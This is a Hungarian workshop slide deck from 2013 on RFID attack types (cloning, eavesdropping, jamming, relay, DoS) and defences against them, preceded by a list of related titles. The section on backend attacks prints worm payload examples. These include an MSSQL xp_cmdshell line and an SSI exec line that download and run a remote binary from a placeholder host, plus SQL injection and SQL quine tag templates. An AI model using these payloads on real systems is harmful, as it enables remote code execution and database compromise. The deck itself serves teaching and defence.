2013.06.17. Workshop Eger, EKF TTK MatInf.



Hasonló dokumentumok
RFID rendszerek sebezhetőségének vizsgálata

Az RFID technológia bemutatása

Hálózatok esszé RFID A rádiófrekvenciás azonosító rendszerek. Gacsályi Bertalan (GABMAAT.SZE)

AUTOMATED FARE COLLECTION (AFC) RENDSZEREK

Az azonosító a rádióhullám mezőben felhasználva annak energiáját válaszol az olvasó parancsainak

Az adatvédelem helyzete az RFID-ban The issue of data privacy in RFID

RFID rendszer felépítése

Elektronikus levelek. Az informatikai biztonság alapjai II.

Bevezetés. Adatvédelmi célok

Adatbázisok elleni fenyegetések rendszerezése. Fleiner Rita BMF/NIK Robothadviselés 2009

R5 kutatási feladatok és várható eredmények. RFID future R Király Roland - Eger, EKF TTK MatInf

Könyvtári címkéző munkahely

Titkok. Oracle adatbázisok proaktív es reaktív védelmi eszközei. Mosolygó Ferenc, vezetı technológiai tanácsadó. <Insert Picture Here>

Webapp (in)security. Gyakori hibákról és azok kivédéséről fejlesztőknek és üzemeltetőknek egyaránt. Veres-Szentkirályi András

Fábián Zoltán Hálózatok elmélet

2. előadás. Radio Frequency IDentification (RFID)

Verzió: PROCONTROL ELECTRONICS LTD

IP alapú távközlés. Virtuális magánhálózatok (VPN)

DHA VÉDELMI RENDSZER EREDMÉNYEINEK STATISZTIKAI VIZSGÁLATA

IP Telefónia és Biztonság

Számítógépes alapismeretek 2.

Kábel nélküli hálózatok. Agrárinformatikai Nyári Egyetem Gödöllő 2004

Leolvasói rendszer kialakításának koncepciója ipari mobil eszközökkel (ipari PDA-val)

RFID a gyógyszeripari logisztikában 2007.

HÁLÓZATBIZTONSÁG III. rész

RFID alapú azonosítási rendszerek

tulajdonjogok j védelmére

Vonalkód olvasó rendszer. Specifikáció Vonalkód olvasó rendszer SoftMaster Kft. [1]

Nem attól secure, hogy drága! A vállalati Wi-Fi biztonságos bevezetése

Megbízhatóság az informatikai rendszerekben

VL IT i n du s t ri al Kommunikációs vázlat

Silent Signal Kft. Webáruházak informatikai biztonsága Veres-Szentkirályi András Marketingtorta - 4 1

Az Internet jövője Internet of Things

RFID-val támogatott eszközleltár

GLOBÁLIS KIHÍVÁS, REGIONÁLIS VÁLASZOK

COMET webalkalmazás fejlesztés. Tóth Ádám Jasmin Media Group

Interferencia jelenségek a BME permanens állomásán

Valimed API. REST API a magyarországi orvos pecsétszámok validálására

OO PDO. Tehát PDO használatával, könnyen átállhatunk egy másik adatbáziskezelőre, anélkül hogy a kódot teljes egészében újraírnánk.

Informatika. 3. Az informatika felhasználási területei és gazdasági hatásai

Murinkó Gergő

Beléptető rendszer RFID (érintésmentes) olvasóval

AC-MF1W. RFID kártyaolvasó és kódzár. Felhasználói leírás

Számítógépes vírusok. Barta Bettina 12. B

API tervezése mobil környezetbe. gyakorlat

TRBOnet Térinformatikai terminál és diszpécseri konzol

14. óra op. rendszer ECDL alapok

Privacy barát RFID technológia

IT hálózat biztonság. Hálózati támadások

Informatikai biztonság alapjai

Adatbázis Rendszerek II. 1. SQL programozási felületek 39/1B IT MAN

SQL jogosultság-kezelés. Privilégiumok Grant és Revoke Grant Diagrammok

Budapest Főváros Kormányhivatala. Földmérési, Távérzékelési és Földhivatali Főosztály. Általános Szerződési Feltételek.

Tét Város Polgármesteri Hivatal

Gyűjtő szinten. Alacsony 6 hónap >4 év Az alkalmazás bevezetéséhez szükséges idő

A jövõ elkezdõdött: EPCglobal Network Magyarországon

GDPR az EU Általános Adatvédelmi Rendelete - minden vállalkozás életét érintő jogszabály -

Történet. Számítógépes vírusok. Mik a vírusok? A vírusok felépítése

Bemutatkozik a BIZMUT EHS szakértőktől XXI. Század igényeihez igazodva

Active Directory kiegészítő kiszolgálók telepítése és konfigurálása Windows Server 2003 R2 alatt

Informatikai biztonság, IT infrastruktúra

XSS férgek és vírusok

vezeték nélküli Turi János Mérnök tanácsadó Cisco Systems Magyarország Kft.

Adatbiztonság PPZH május 20.

Microsoft SQL Server telepítése

Hulladék Gyűjtési Rendszer (GTC)

Kétszeri Dávid vezető szakértő GS1 MAGYARORSZÁG Kiemelkedően Közhasznú Nonprofit Zrt. Visegrád, november 26.

Egészítsük ki a Drupal-t. Drupal modul fejlesztés

Magic xpi 4.0 vadonatúj Architektúrája Gigaspaces alapokon

Wi-Fi technológia a műtőben

ACR122U-A9. NFC USB intelligens kártyaolvasó. Műszaki Specifikáció V3.04 verzió

Irányelv Termékbeszerzés és -jelölés

Fogalomtár Etikus hackelés tárgyban Azonosító: S2_Fogalomtar_v1 Silent Signal Kft. Web:

SC Kérdés. SC Kérdés. SC Kérdés

Internet of Things 2

Vírusok. - önreprodukcióra képes, károkat okozó program

IP Thermo for Windows

Adatbázis-kezelés. Dr. Fülep Dávid. SELECT id FROM tantargy WHERE intezmeny = sze ORDER BY hasznossag LIMIT 1 NGB_SZ_003_9

PROCONTROL Proxer6. RFID Proximity kártyaolvasó. Procontrol Proxer6. Verzió: PROCONTROL ELECTRONICS LTD

Weboldalak Biztonsági Kérdései

Vezetéknélküli technológia

Állami Nyomda Rt. Nemzetközi minôsítések. Rendszerben gondolkozunk

Hálózati ismeretek. Az együttműködés szükségessége:

Tananyagok adaptív kiszolgálása különböző platformok felé. Fazekas László Dr. Simonics István Wagner Balázs

Informatikai biztonság a kezdetektől napjainkig

Teljes körű weboldal, API és DDoS védelmi szolgáltatás

Információs társadalom

Wireless M-Bus, C mód modul MULTICAL 402 fogyasztásmérőkhöz Adatlap

Kísérleti üzemek az élelmiszeriparban alkalmazható fejlett gépgyártás-technológiai megoldások kifejlesztéséhez, kipróbálásához és oktatásához

A számítógép egységei

Számítógép hálózatok gyakorlat

Copyright 2012, Oracle and/or its affiliates. All rights reserved.

A JGrid rendszer biztonsági architektúrája. Magyaródi Márk Juhász Zoltán Veszprémi Egyetem

SZOFTVER = a számítógépet működtető és az azon futó programok összessége.

Irányító és kommunikációs rendszerek III. Előadás 13

Technológia az adatszivárgás ellen

IV. Számítógépes vírusok és védekezési módszerek

A tűzfal mögötti adatvédelem. Kalmár István ICT technológia szakértő

MIKOVINY SÁMUEL TÉRINFORMATIKAI EMLÉKVERSENY

FELHASZNÁLÓI DOKUMENTÁCIÓ ÜZEMBEHELYEZÉSI KÉZIKÖNYV

Átírás:

RFID ESZKÖZÖK TÁMADHATÓSÁGA, LEHETSÉGES VÉDEKEZÉS ELLENÜK BIRÓ CSABA, RADVÁNYI TIBOR, TAKÁCS PÉTER, SZIGETVÁRY PÉTER, BOTOS BERTALAN, ZAVARKÓ RICHÁRD, KÜSTEL FANNY, SZÁNTÓ GIZELLA 2013.06.17. Workshop Eger, EKF TTK MatInf.

Tartalom RFID rendszerek (nyílt és zárt) Lehetséges támadási módok Címkéket veszélyeztető Az olvasó és a tag közötti kommunikációt érő Háttérrendszert veszélyeztető Összefoglalás

RFID rendszerek

Nyílt és zárt rendszerek Megkülönböztetünk nyílt és zárt rendszereket, aktív és passzív felhasználókkal. A zárt rendszerek esetében (pl.: gyártás nyomon követése) az aktív és a passzív fél nincs különválasztva, a rendszer üzemeltetője egyben a felhasználója is. A nyílt rendszerek esetén az aktív fél szolgáltatja az infrastruktúrát, adminisztrálja és kezeli a keletkezett adatokat. Passzív félként pedig azokra a felhasználókra tekintünk, akik igénybe veszik a szolgáltatást és tudatosan, vagy tudtuk nélkül adatokat szolgáltatnak. Pl.: közösségi közlekedés esetén a közlekedési vállalat az aktív, az utasok a passzív fél.

Lehetséges támadási módok

Címkéket veszélyeztető támadási módok Fizikai támadások Klónozás

Fizikai támadások Vissza nem fordítható sérülések: az adattároló chip mechanikai sérülése; kémiai anyag okozta sérülés; az antenna leválasztása a chip-ről; erős mágneses tér által okozott roncsolódás (pl.: mikrohullámú sütő). Átmeneti működési zavar pl.: alufóliába tekerjük a tag-et; fémes felülethez túl közel kerül; rossz vezetőképességű anyaggal csökkentjük az olvasási távolságot.

Cloning Klónozás Megelőzés EPC szabványnak megfelelő tag-ek (TID); PUF (Physical Unclonable Function) Minden egyes chip a szilícium fizikai jellemzőinek és az eltérő IC gyártási folyamatoknak köszönhetően egyedülálló módon jellemezhető, klónozhatatlan. Detektálás Több eljárás is létezik, de egyik sem igényel kriptográfiai műveleteket a címkéktől.

Az olvasó és a tag közötti adatátvitelt érő támadások Szaglászás Nyomon követés Hamisítás Lehallgatás Zavarás Túlterheléses támadás Zsebtolvajlás

A címkéket úgy tervezték, hogy bármilyen kompatibilis olvasó képes leolvasni a rajta tárolt adatot. Sniffing - Szaglászás Az olvasás a címkehordozó tudta nélkül is megtörténhet akár nagy távolságról is. Tracking Nyomon követés Egyes pontokon elhelyezett olvasók képesek rögzíteni az arra járó egyedi címkéket, majd ebből azonosítani a személyt, vagy amit éppen azonosít a címke.

Spoofing Hamisítás Mindegyik címke veszélyeztetett, ami nem rendelkezik titkosítással! Jelenleg az alábbi területeken használnak titkosítással ellátott rendszereket, a teljesség igénye nélkül: tömegközlekedési jegyek, orvosi rendszerek, beléptető rendszerek, elektronikus fizetés, epassport, eid.

Eavesdropping Lehallgatás Az RFID rendszer elektromágneses hullámokat használ a jelátvitelhez, mely elég könnyen és egyszerű eszközökkel lehallgatható, korlátot inkább az olvasási távolság jelent. Az olvasó és a tag közötti leolvasási távolság a néhány centimétertől (13.56MHz) a méteres tartományig terjed (868MHz). pl. 13.56MHz működő rendszernél ideális esetben a lehallgatás sikeres lehet 3 méteres távolságból. A lehallgatás sikerességét befolyásolja az átviteli protokoll fajtája, az esetlegesen használt titkosítás és a környezetből érkező zavaró hatások.

Jamming Zavarás A jelátvitel megzavarása, akadályozása az olvasó és a tag között valamilyen interferenciát okozó jel segítségével. A hatékony zavarás érdekében a zavaró jelet kibocsájtó eszköznek: közel kell lennie az olvasóhoz, kellően nagy antennával kell rendelkeznie, elég nagy energiával kell sugározni.

Denial of Service (DoS) - túlterheléses támadás A korszerű olvasók képesek kommunikálni nagyszámú tag-el, az olvasási terükön belül, az azonosításhoz jellemzően a tag-ek sorozatszámát fölhasználva. A támadást egy olyan speciális blokkoló tag-el hajtható végre, ami képes szimulálni annyi gyári szám kombinációt, melynek feldolgozása akár évekbe is beletelhet. A rendszer lelassítható, akár teljesen le is állítható!

Relay Attack zsebtolvajlás A tag-et fizikai hozzáférés nélkül használja fel a támadó a saját céljára. Ezt a fajta támadást hívhatnánk virtuális zsebtolvajlásnak is, mely arra épít, hogy bizonyos tranzakciók nem igénylik a felhasználó visszaigazolását.

Háttérrendszert veszélyeztető támadási módok Férgek Rosszindulatú szoftverek Vírusok

Férgek Az RFID bázisú féreg nem igényel semmilyen felhasználói aktivitást, hanem terjed a címkével együtt, ha alkalma adódik rá. Működése: Megtalálja és feltérképezi a middleware-t, majd megfertőzi azt. SQL injekció bázisú féreg: (Microsoft SQL serveren): EXEC Master.xp cmdshell tftp -i %ip% GET myexploit.exe & myexploit ; Ezzel rávettük a servert, hogy ne csak saját szoftvert futtasson, hanem kívülről is futtathassunk script-et. Webes biztonsági rés kihasználására: <! -- #exec cmd= wget http://%ip%/myexploit -O /tmp/myexploit; chmod +x /tmp/myexploit; /tmp/myexploit --> Képesek átírni a tag-eken lévő adatokat és terjeszteni magukat címkéről címkére, megfertőzve a hozzá kapcsolódó összes programot.

RFID malware Az RFID tag-ek a middleware-t használják közvetlenül. Erőforrásuk annyira korlátozott, hogy még magukat sem képesek megvédeni. Az igazság az, hogy 1Kb-nál kevesebb adat is képes lenne megtalálni a biztonsági réseket a middleware-en, ami veszélyeztethetné a számítógépet vagy akár a teljes hálózatot. A rendszer beolvasás közben a legsebezhetőbb! Ez az a folyamat, amikor egy RFID olvasó beolvassa a címkét, és arra számít, hogy tájékoztatást kap róla egy előre meghatározott formátumban. Az RFID malware-ek egyre dinamikusabban terjednek, egyre nagyobb veszély jelentenek az RFID rendszerekre.

Biztonsági rések Lots of Source Code Egy middleware rendszer több százezer, sőt több millió sornyi kódból áll. A bug-ok a kódban átlagosan 6-16 db 1000 soronként. Ebből következik, hogy sok használható biztonsági rést tartalmaz. Back-end databases Az RFID lényege az automatikus adatgyűjtés. Ehhez adatbázisra van szükség, amiben tároljuk az adatokat és lekérdezhetővé tesszük őket. A rossz hír ebben az, hogy az adatbázis szoftverben is van biztonsági rés és támadható. High-Value Data Az értékes adatok vonzzák a számítógépes bűnözőket. Az adatok lehetnek személyes, pénzügyi vagy akár nemzetbiztonsági titkos anyagok. Rossz hír, hogy az RFID malware több kárt okozhat, mint a hagyományos malware. False sense of Security A legtöbb hacker támadás, a könnyű célpontokat veszi célba legelőször. Jelenleg elég sebezhető egy RFID rendszer. A middleware fejlesztőknek fel kell venniük a harcot a problémákkal.

Vírusok A férgekkel ellentétben nincs szükségük internetkapcsolatra. 1. példa A támadó készít egy vírusos címkét, majd egy macska nyakörvébe helyezi el. Elviszi az orvoshoz, hogy talált egy kóbor macskát. Az orvos készít egy címkét a talált állatkának, miközben a fertőzött címke az állaton van, és készen áll arra, hogy megfertőzze a háttérrendszert. Ez olyan, mint egy biológiai vírus, ami képes terjedni állatról állatra. 2. példa Vannak olyan repterek ahol RFID technológiával ellenőrzik a csomagokat. Vegyünk egy rosszindulatú utast, aki egy fertőzött címkét tesz a csomagjába, majd becsekkolja. A vírus eléri célját és megfertőzi az adatbázist, majd idővel átterjedhetne más repterekre is megbénítva azt.

Replikáció Egy RFID rendszer általános működése a következő: Egy raklap friss áru elhalad az olvasó előtt, majd az elosztó központba érkezik. Az olvasó azonosítja a terméket, majd közli az információkat az érintett adatbázissal, majd jöhet a következő csomag. Az előbb leírt működésbe kerülhet vírus, ami felborítja a helyes működést. Contents=Málna;UPDATE NewContainerContents SET ContainerContents = ContainerContents ;[SQL Injection] ; Az [SQL Injection] most egy helyőrző ahová behelyettesíthetünk valamilyen gonosz SQL utasítást. A működés a következő: A fertőzött címke bekerül a rendszerbe egy olvasó által, majd megfertőzi az adatbázist. Ezután újabb ilyen címkék beolvasása történhet, ami megfertőzi az egész rendszert, majd a rendszer megfertőz más címkéket, amik más rendszereket is tönkretehetnek.

Saját magukra hivatkozó parancsok A legtöbb adatbázis engedi az aktuálisan futó lekérdezések listázását. Oracle: SELECT SQL TEXT FROM v$sql WHERE INSTR(SQL TEXT, )> 0; Postgre SQL: Contents=Málna; UPDATE NewContainerContents SET ContainerContents= ContainerContents ; CHR(10) (SELECT SQL TEXT FROM v$sql WHERE INSTR(SQL TEXT, )> 0);

SQL Quine Egy másik módja az RFID vírus önreprodukciójára az SQL Quine. Quine: Kód és Adat. A kód maga a sejt, az adat pedig a sejt DNS-ét reprezentálja, ami képes saját magát replikálni intron-ok (fehérjék) segítségével lehet, anélkül hogy sérülne az önreplikáló képessége a kódnak. MYSQL: %content% WHERE tagid= %id% ; SET @a= UPDATE ContainerContents SET NewContents=concat(\ %content%\ \ \ WHERE tagid=\ \ \ %id%\ \ \ ; SET @a=\, QUOTE(@a),\ ; \, @a); %payload%; -- ; UPDATE ContainerContents SET NewContents=concat( %content%\ WHERE tagid=\ %id%\ ; SET @a=, QUOTE(@a), ;, @a); %payload%; -- Adatbázis változók segítségével tárolja a lefuttatott lekérdezéseket. Hátránya, hogy kód által foglalt hely akár a 2-3 szorosára is nőhet.

Összefoglalás Támadási mód Visszafejtés Teljesítmény analízis Lehallgatás Ember a rendszer közepén Klónozás Jogtalan olvasás Jogtalan írás/módosítás Hamisítás Zavarás Ismétlődés Vírus Tag-ek illetéktelen eltávolítása Követés Visszaélés a Kill paranccsal Tag blokkolás Védekezési forma Optikai hamisítást felismerő szenzor Speciális chip bevonat Randomizáció Titkosítás Back-end szerver használata Titkosítás Azonosítás Azonosítás Duplikáció felismerése Azonosítás EM mező ellenőrzése Back-end szerver használata Azonosítás EM mező ellenőrzése Csak olvasható tag-ek használata EM mező ellenőrzése FH-CDMA, FHSS Titkosítás Azonosítás Kérdés és Válasz Ellenőrzés és paraméter kötés Mechanikai összeköttetés Riasztó funkció az aktív tag-ekbe Kill funkció Azonosítás Nem minősül támadásnak, nincs megfelelő védelmi

Köszönjük a figyelmet!